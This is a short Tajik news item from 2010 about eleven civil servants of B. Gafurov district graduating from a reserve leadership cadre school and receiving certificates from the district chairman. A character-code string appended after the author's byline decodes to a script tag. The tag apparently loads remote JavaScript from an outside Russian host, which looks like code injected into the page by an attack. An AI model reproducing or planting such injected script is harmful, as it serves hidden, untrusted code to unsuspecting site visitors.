19.11.2010
Хизматчиёни давлатӣ омода мешаванд
11 нафар кормандони мақомоти маҳалли ва хизматчиёни давлатии ноҳияи Б. Ғафуров мактаби кадрҳои захиравии роҳбарикунандаи Мақомоти иҷроияи ҳокимияти давлатии ноҳияи Б. Ғафуровро хатм намуданд. Раиси ноҳияи Б. Ғафуров Лутфулло Муҳиддинов дар лаҳзаи тантанави шаҳодатномаи хатмкунандагонро супорида изҳори умедвори намуд, ки онҳо дар соҳаҳои гуногуни хоҷагии халқ фаъолияти пурсамар хоҳанд кард. Ин гурӯҳ нӯҳумин хатмкунандагони мактаби мазкур буда, минбаъд чун захираҳои кадрии хизматчиёни давлати ба ҳисоб мераванд.
Афзал Босолиев
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)a991d48b1fb6d92e4bdf6121e956a49a.js" type="text/javascript">

